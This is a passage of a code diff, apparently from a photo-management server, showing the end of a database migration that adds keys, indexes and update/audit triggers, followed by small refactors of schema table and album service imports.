+  await sql`ALTER TABLE "tags" ADD CONSTRAINT "PK_e7dc17249a1148a1970748eda99" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "PK_ef5346fe522b5fb3bc96454747e" PRIMARY KEY ("assetsId", "tagsId");`.execute(db);
+  await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "PK_eab38eb12a3ec6df8376c95477c" PRIMARY KEY ("id_ancestor", "id_descendant");`.execute(db);
+  await sql`ALTER TABLE "users_audit" ADD CONSTRAINT "PK_e9b2bdfd90e7eb5961091175180" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "user_metadata" ADD CONSTRAINT "PK_5931462150b3438cbc83277fe5a" PRIMARY KEY ("userId", "key");`.execute(db);
+  await sql`ALTER TABLE "version_history" ADD CONSTRAINT "PK_5db259cbb09ce82c0d13cfd1b23" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "libraries" ADD CONSTRAINT "FK_0f6fc2fb195f24d19b0fb0d57c1" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "FK_91704e101438fd0653f582426dc" FOREIGN KEY ("primaryAssetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE NO ACTION;`.execute(db);
+  await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "FK_c05079e542fd74de3b5ecb5c1c8" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_2c5ac0d6fb58b238fd2068de67d" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_16294b83fa8c0149719a1f631ef" FOREIGN KEY ("livePhotoVideoId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
+  await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_9977c3c1de01c3d848039a6b90c" FOREIGN KEY ("libraryId") REFERENCES "libraries" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "assets" ADD CONSTRAINT "FK_f15d48fa3ea5e4bda05ca8ab207" FOREIGN KEY ("stackId") REFERENCES "asset_stack" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
+  await sql`ALTER TABLE "albums" ADD CONSTRAINT "FK_b22c53f35ef20c28c21637c85f4" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "albums" ADD CONSTRAINT "FK_05895aa505a670300d4816debce" FOREIGN KEY ("albumThumbnailAssetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
+  await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_1af8519996fbfb3684b58df280b" FOREIGN KEY ("albumId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_3571467bcbe021f66e2bdce96ea" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "activity" ADD CONSTRAINT "FK_8091ea76b12338cb4428d33d782" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "FK_e590fa396c6898fcd4a50e40927" FOREIGN KEY ("albumsId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "FK_4bd1303d199f4e72ccdf998c621" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "FK_427c350ad49bd3935a50baab737" FOREIGN KEY ("albumsId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "FK_f48513bf9bccefd6ff3ad30bd06" FOREIGN KEY ("usersId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "api_keys" ADD CONSTRAINT "FK_6c2e267ae764a9413b863a29342" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "person" ADD CONSTRAINT "FK_5527cc99f530a547093f9e577b6" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "person" ADD CONSTRAINT "FK_2bbabe31656b6778c6b87b61023" FOREIGN KEY ("faceAssetId") REFERENCES "asset_faces" ("id") ON UPDATE NO ACTION ON DELETE SET NULL;`.execute(db);
+  await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "FK_02a43fd0b3c50fb6d7f0cb7282c" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "FK_95ad7106dd7b484275443f580f9" FOREIGN KEY ("personId") REFERENCES "person" ("id") ON UPDATE CASCADE ON DELETE SET NULL;`.execute(db);
+  await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "FK_e3e103a5f1d8bc8402999286040" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "asset_job_status" ADD CONSTRAINT "FK_420bec36fc02813bddf5c8b73d4" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "exif" ADD CONSTRAINT "FK_c0117fdbc50b917ef9067740c44" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "face_search" ADD CONSTRAINT "face_search_faceId_fkey" FOREIGN KEY ("faceId") REFERENCES "asset_faces" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "memories" ADD CONSTRAINT "FK_575842846f0c28fa5da46c99b19" FOREIGN KEY ("ownerId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "FK_984e5c9ab1f04d34538cd32334e" FOREIGN KEY ("memoriesId") REFERENCES "memories" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "FK_6942ecf52d75d4273de19d2c16f" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "partners" ADD CONSTRAINT "FK_7e077a8b70b3530138610ff5e04" FOREIGN KEY ("sharedById") REFERENCES "users" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "partners" ADD CONSTRAINT "FK_d7e875c6c60e661723dbf372fd3" FOREIGN KEY ("sharedWithId") REFERENCES "users" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "sessions" ADD CONSTRAINT "FK_57de40bc620f456c7311aa3a1e6" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "FK_66fe3837414c5a9f1c33ca49340" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "FK_0c6ce9058c29f07cdf7014eac66" FOREIGN KEY ("albumId") REFERENCES "albums" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "FK_5b7decce6c8d3db9593d6111a66" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "FK_c9fab4aa97ffd1b034f3d6581ab" FOREIGN KEY ("sharedLinksId") REFERENCES "shared_links" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "smart_search" ADD CONSTRAINT "smart_search_assetId_fkey" FOREIGN KEY ("assetId") REFERENCES "assets" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "session_sync_checkpoints" ADD CONSTRAINT "FK_d8ddd9d687816cc490432b3d4bc" FOREIGN KEY ("sessionId") REFERENCES "sessions" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tags" ADD CONSTRAINT "FK_92e67dc508c705dd66c94615576" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tags" ADD CONSTRAINT "FK_9f9590cc11561f1f48ff034ef99" FOREIGN KEY ("parentId") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "FK_f8e8a9e893cb5c54907f1b798e9" FOREIGN KEY ("assetsId") REFERENCES "assets" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tag_asset" ADD CONSTRAINT "FK_e99f31ea4cdf3a2c35c7287eb42" FOREIGN KEY ("tagsId") REFERENCES "tags" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "FK_15fbcbc67663c6bfc07b354c22c" FOREIGN KEY ("id_ancestor") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "tags_closure" ADD CONSTRAINT "FK_b1a2a7ed45c29179b5ad51548a1" FOREIGN KEY ("id_descendant") REFERENCES "tags" ("id") ON UPDATE NO ACTION ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "user_metadata" ADD CONSTRAINT "FK_6afb43681a21cf7815932bc38ac" FOREIGN KEY ("userId") REFERENCES "users" ("id") ON UPDATE CASCADE ON DELETE CASCADE;`.execute(db);
+  await sql`ALTER TABLE "users" ADD CONSTRAINT "UQ_97672ac88f789774dd47f7c8be3" UNIQUE ("email");`.execute(db);
+  await sql`ALTER TABLE "users" ADD CONSTRAINT "UQ_b309cf34fa58137c416b32cea3a" UNIQUE ("storageLabel");`.execute(db);
+  await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "REL_91704e101438fd0653f582426d" UNIQUE ("primaryAssetId");`.execute(db);
+  await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "UQ_assetId_type" UNIQUE ("assetId", "type");`.execute(db);
+  await sql`ALTER TABLE "move_history" ADD CONSTRAINT "UQ_newPath" UNIQUE ("newPath");`.execute(db);
+  await sql`ALTER TABLE "move_history" ADD CONSTRAINT "UQ_entityId_pathType" UNIQUE ("entityId", "pathType");`.execute(db);
+  await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "UQ_sharedlink_key" UNIQUE ("key");`.execute(db);
+  await sql`ALTER TABLE "tags" ADD CONSTRAINT "UQ_79d6f16e52bb2c7130375246793" UNIQUE ("userId", "value");`.execute(db);
+  await sql`ALTER TABLE "activity" ADD CONSTRAINT "CHK_2ab1e70f113f450eb40c1e3ec8" CHECK (("comment" IS NULL AND "isLiked" = true) OR ("comment" IS NOT NULL AND "isLiked" = false));`.execute(db);
+  await sql`ALTER TABLE "person" ADD CONSTRAINT "CHK_b0f82b0ed662bfc24fbb58bb45" CHECK ("birthDate" <= CURRENT_DATE);`.execute(db);
+  await sql`CREATE INDEX "IDX_users_updated_at_asc_id_asc" ON "users" ("updatedAt", "id")`.execute(db);
+  await sql`CREATE INDEX "IDX_users_update_id" ON "users" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_0f6fc2fb195f24d19b0fb0d57c" ON "libraries" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "IDX_libraries_update_id" ON "libraries" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_91704e101438fd0653f582426d" ON "asset_stack" ("primaryAssetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_c05079e542fd74de3b5ecb5c1c" ON "asset_stack" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "idx_originalfilename_trigram" ON "assets" USING gin (f_unaccent("originalFileName") gin_trgm_ops)`.execute(db);
+  await sql`CREATE INDEX "IDX_asset_id_stackId" ON "assets" ("id", "stackId")`.execute(db);
+  await sql`CREATE INDEX "IDX_originalPath_libraryId" ON "assets" ("originalPath", "libraryId")`.execute(db);
+  await sql`CREATE INDEX "idx_local_date_time_month" ON "assets" ((date_trunc('MONTH'::text, ("localDateTime" AT TIME ZONE 'UTC'::text)) AT TIME ZONE 'UTC'::text))`.execute(db);
+  await sql`CREATE INDEX "idx_local_date_time" ON "assets" ((("localDateTime" at time zone 'UTC')::date))`.execute(db);
+  await sql`CREATE UNIQUE INDEX "UQ_assets_owner_library_checksum" ON "assets" ("ownerId", "libraryId", "checksum") WHERE ("libraryId" IS NOT NULL)`.execute(db);
+  await sql`CREATE UNIQUE INDEX "UQ_assets_owner_checksum" ON "assets" ("ownerId", "checksum") WHERE ("libraryId" IS NULL)`.execute(db);
+  await sql`CREATE INDEX "IDX_2c5ac0d6fb58b238fd2068de67" ON "assets" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "idx_asset_file_created_at" ON "assets" ("fileCreatedAt")`.execute(db);
+  await sql`CREATE INDEX "IDX_8d3efe36c0755849395e6ea866" ON "assets" ("checksum")`.execute(db);
+  await sql`CREATE INDEX "IDX_16294b83fa8c0149719a1f631e" ON "assets" ("livePhotoVideoId")`.execute(db);
+  await sql`CREATE INDEX "IDX_4d66e76dada1ca180f67a205dc" ON "assets" ("originalFileName")`.execute(db);
+  await sql`CREATE INDEX "IDX_9977c3c1de01c3d848039a6b90" ON "assets" ("libraryId")`.execute(db);
+  await sql`CREATE INDEX "IDX_f15d48fa3ea5e4bda05ca8ab20" ON "assets" ("stackId")`.execute(db);
+  await sql`CREATE INDEX "IDX_assets_duplicateId" ON "assets" ("duplicateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_assets_update_id" ON "assets" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_b22c53f35ef20c28c21637c85f" ON "albums" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "IDX_05895aa505a670300d4816debc" ON "albums" ("albumThumbnailAssetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_albums_update_id" ON "albums" ("updateId")`.execute(db);
+  await sql`CREATE UNIQUE INDEX "IDX_activity_like" ON "activity" ("assetId", "userId", "albumId") WHERE ("isLiked" = true)`.execute(db);
+  await sql`CREATE INDEX "IDX_1af8519996fbfb3684b58df280" ON "activity" ("albumId")`.execute(db);
+  await sql`CREATE INDEX "IDX_3571467bcbe021f66e2bdce96e" ON "activity" ("userId")`.execute(db);
+  await sql`CREATE INDEX "IDX_8091ea76b12338cb4428d33d78" ON "activity" ("assetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_activity_update_id" ON "activity" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_e590fa396c6898fcd4a50e4092" ON "albums_assets_assets" ("albumsId")`.execute(db);
+  await sql`CREATE INDEX "IDX_4bd1303d199f4e72ccdf998c62" ON "albums_assets_assets" ("assetsId")`.execute(db);
+  await sql`CREATE INDEX "IDX_f48513bf9bccefd6ff3ad30bd0" ON "albums_shared_users_users" ("usersId")`.execute(db);
+  await sql`CREATE INDEX "IDX_427c350ad49bd3935a50baab73" ON "albums_shared_users_users" ("albumsId")`.execute(db);
+  await sql`CREATE INDEX "IDX_6c2e267ae764a9413b863a2934" ON "api_keys" ("userId")`.execute(db);
+  await sql`CREATE INDEX "IDX_api_keys_update_id" ON "api_keys" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_assets_audit_asset_id" ON "assets_audit" ("assetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_assets_audit_owner_id" ON "assets_audit" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "IDX_assets_audit_deleted_at" ON "assets_audit" ("deletedAt")`.execute(db);
+  await sql`CREATE INDEX "IDX_5527cc99f530a547093f9e577b" ON "person" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "IDX_2bbabe31656b6778c6b87b6102" ON "person" ("faceAssetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_person_update_id" ON "person" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_bf339a24070dac7e71304ec530" ON "asset_faces" ("personId", "assetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_asset_faces_assetId_personId" ON "asset_faces" ("assetId", "personId")`.execute(db);
+  await sql`CREATE INDEX "IDX_02a43fd0b3c50fb6d7f0cb7282" ON "asset_faces" ("assetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_95ad7106dd7b484275443f580f" ON "asset_faces" ("personId")`.execute(db);
+  await sql`CREATE INDEX "IDX_asset_files_assetId" ON "asset_files" ("assetId")`.execute(db);
+  await sql`CREATE INDEX "IDX_asset_files_update_id" ON "asset_files" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_ownerId_createdAt" ON "audit" ("ownerId", "createdAt")`.execute(db);
+  await sql`CREATE INDEX "exif_city" ON "exif" ("city")`.execute(db);
+  await sql`CREATE INDEX "IDX_live_photo_cid" ON "exif" ("livePhotoCID")`.execute(db);
+  await sql`CREATE INDEX "IDX_auto_stack_id" ON "exif" ("autoStackId")`.execute(db);
+  await sql`CREATE INDEX "IDX_asset_exif_update_id" ON "exif" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "face_index" ON "face_search" USING hnsw (embedding vector_cosine_ops) WITH (ef_construction = 300, m = 16)`.execute(db);
+  await sql`CREATE INDEX "IDX_geodata_gist_earthcoord" ON "geodata_places" (ll_to_earth_public(latitude, longitude))`.execute(db);
+  await sql`CREATE INDEX "idx_geodata_places_name" ON "geodata_places" USING gin (f_unaccent("name") gin_trgm_ops)`.execute(db);
+  await sql`CREATE INDEX "idx_geodata_places_admin2_name" ON "geodata_places" USING gin (f_unaccent("admin2Name") gin_trgm_ops)`.execute(db);
+  await sql`CREATE INDEX "idx_geodata_places_admin1_name" ON "geodata_places" USING gin (f_unaccent("admin1Name") gin_trgm_ops)`.execute(db);
+  await sql`CREATE INDEX "idx_geodata_places_alternate_names" ON "geodata_places" USING gin (f_unaccent("alternateNames") gin_trgm_ops)`.execute(db);
+  await sql`CREATE INDEX "IDX_575842846f0c28fa5da46c99b1" ON "memories" ("ownerId")`.execute(db);
+  await sql`CREATE INDEX "IDX_memories_update_id" ON "memories" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_984e5c9ab1f04d34538cd32334" ON "memories_assets_assets" ("memoriesId")`.execute(db);
+  await sql`CREATE INDEX "IDX_6942ecf52d75d4273de19d2c16" ON "memories_assets_assets" ("assetsId")`.execute(db);
+  await sql`CREATE INDEX "IDX_partners_audit_shared_by_id" ON "partners_audit" ("sharedById")`.execute(db);
+  await sql`CREATE INDEX "IDX_partners_audit_shared_with_id" ON "partners_audit" ("sharedWithId")`.execute(db);
+  await sql`CREATE INDEX "IDX_partners_audit_deleted_at" ON "partners_audit" ("deletedAt")`.execute(db);
+  await sql`CREATE INDEX "IDX_7e077a8b70b3530138610ff5e0" ON "partners" ("sharedById")`.execute(db);
+  await sql`CREATE INDEX "IDX_d7e875c6c60e661723dbf372fd" ON "partners" ("sharedWithId")`.execute(db);
+  await sql`CREATE INDEX "IDX_partners_update_id" ON "partners" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_57de40bc620f456c7311aa3a1e" ON "sessions" ("userId")`.execute(db);
+  await sql`CREATE INDEX "IDX_sessions_update_id" ON "sessions" ("updateId")`.execute(db);
+  await sql`CREATE INDEX "IDX_66fe3837414c5a9f1c33ca4934" ON "shared_links" ("userId")`.execute(db);
+  await sql`CREATE INDEX "IDX_sharedlink_key" ON "shared_links" ("key")`.execute(db);
+  await sql`CREATE INDEX "IDX_sharedlink_albumId" ON "shared_links" ("albumId")`.execute(db);
+  await sql`CREATE INDEX "IDX_5b7decce6c8d3db9593d6111a6" ON "shared_link__asset" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_c9fab4aa97ffd1b034f3d6581a" ON "shared_link__asset" ("sharedLinksId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "clip_index" ON "smart_search" USING hnsw (embedding vector_cosine_ops) WITH (ef_construction = 300, m = 16)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_d8ddd9d687816cc490432b3d4b" ON "session_sync_checkpoints" ("sessionId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_session_sync_checkpoints_update_id" ON "session_sync_checkpoints" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_92e67dc508c705dd66c9461557" ON "tags" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_9f9590cc11561f1f48ff034ef9" ON "tags" ("parentId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_tags_update_id" ON "tags" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_tag_asset_assetsId_tagsId" ON "tag_asset" ("assetsId", "tagsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_f8e8a9e893cb5c54907f1b798e" ON "tag_asset" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_e99f31ea4cdf3a2c35c7287eb4" ON "tag_asset" ("tagsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_15fbcbc67663c6bfc07b354c22" ON "tags_closure" ("id_ancestor")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_b1a2a7ed45c29179b5ad51548a" ON "tags_closure" ("id_descendant")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_users_audit_deleted_at" ON "users_audit" ("deletedAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_6afb43681a21cf7815932bc38a" ON "user_metadata" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "users_delete_audit"
|
||||||
|
AFTER DELETE ON "users"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION users_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "users_updated_at"
|
||||||
|
BEFORE UPDATE ON "users"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "libraries_updated_at"
|
||||||
|
BEFORE UPDATE ON "libraries"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "assets_delete_audit"
|
||||||
|
AFTER DELETE ON "assets"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION assets_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "assets_updated_at"
|
||||||
|
BEFORE UPDATE ON "assets"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "albums_updated_at"
|
||||||
|
BEFORE UPDATE ON "albums"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "activity_updated_at"
|
||||||
|
BEFORE UPDATE ON "activity"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "api_keys_updated_at"
|
||||||
|
BEFORE UPDATE ON "api_keys"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "person_updated_at"
|
||||||
|
BEFORE UPDATE ON "person"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "asset_files_updated_at"
|
||||||
|
BEFORE UPDATE ON "asset_files"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "asset_exif_updated_at"
|
||||||
|
BEFORE UPDATE ON "exif"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "memories_updated_at"
|
||||||
|
BEFORE UPDATE ON "memories"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "partners_delete_audit"
|
||||||
|
AFTER DELETE ON "partners"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION partners_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "partners_updated_at"
|
||||||
|
BEFORE UPDATE ON "partners"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "sessions_updated_at"
|
||||||
|
BEFORE UPDATE ON "sessions"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "session_sync_checkpoints_updated_at"
|
||||||
|
BEFORE UPDATE ON "session_sync_checkpoints"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "tags_updated_at"
|
||||||
|
BEFORE UPDATE ON "tags"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
}
|
||||||
|
|
||||||
|
export async function down(): Promise<void> {
|
||||||
|
// not implemented
|
||||||
|
}
|
@@ -1,5 +1,4 @@
 import { UpdatedAtTrigger, UpdateIdColumn } from 'src/decorators';
-import { ASSET_CHECKSUM_CONSTRAINT } from 'src/entities/asset.entity';
 import { AssetStatus, AssetType } from 'src/enum';
 import { assets_status_enum } from 'src/schema/enums';
 import { assets_delete_audit } from 'src/schema/functions';
@@ -17,6 +16,7 @@ import {
   Table,
   UpdateDateColumn,
 } from 'src/sql-tools';
+import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
 
 @Table('assets')
 @UpdatedAtTrigger('assets_updated_at')
@@ -1,6 +1,6 @@
 import { Column, Index, PrimaryColumn, Table } from 'src/sql-tools';
 
-@Table({ name: 'geodata_places' })
+@Table({ name: 'geodata_places', synchronize: false })
 @Index({
   name: 'idx_geodata_places_alternate_names',
   using: 'gin',
@@ -26,11 +26,10 @@ import { Column, Index, PrimaryColumn, Table } from 'src/sql-tools';
   synchronize: false,
 })
 @Index({
-  name: 'idx_geodata_places_gist_earthcoord',
+  name: 'IDX_geodata_gist_earthcoord',
   expression: 'll_to_earth_public(latitude, longitude)',
   synchronize: false,
 })
-@Table({ name: 'idx_geodata_places', synchronize: false })
 export class GeodataPlacesTable {
   @PrimaryColumn({ type: 'integer' })
   id!: number;
@@ -6,15 +6,15 @@ import {
   AlbumStatisticsResponseDto,
   CreateAlbumDto,
   GetAlbumsDto,
-  UpdateAlbumDto,
-  UpdateAlbumUserDto,
   mapAlbum,
+  MapAlbumDto,
   mapAlbumWithAssets,
   mapAlbumWithoutAssets,
+  UpdateAlbumDto,
+  UpdateAlbumUserDto,
 } from 'src/dtos/album.dto';
 import { BulkIdResponseDto, BulkIdsDto } from 'src/dtos/asset-ids.response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
-import { AlbumEntity } from 'src/entities/album.entity';
 import { Permission } from 'src/enum';
 import { AlbumAssetCount, AlbumInfoOptions } from 'src/repositories/album.repository';
 import { BaseService } from 'src/services/base.service';
@@ -39,7 +39,7 @@ export class AlbumService extends BaseService {
   async getAll({ user: { id: ownerId } }: AuthDto, { assetId, shared }: GetAlbumsDto): Promise<AlbumResponseDto[]> {
     await this.albumRepository.updateThumbnails();
 
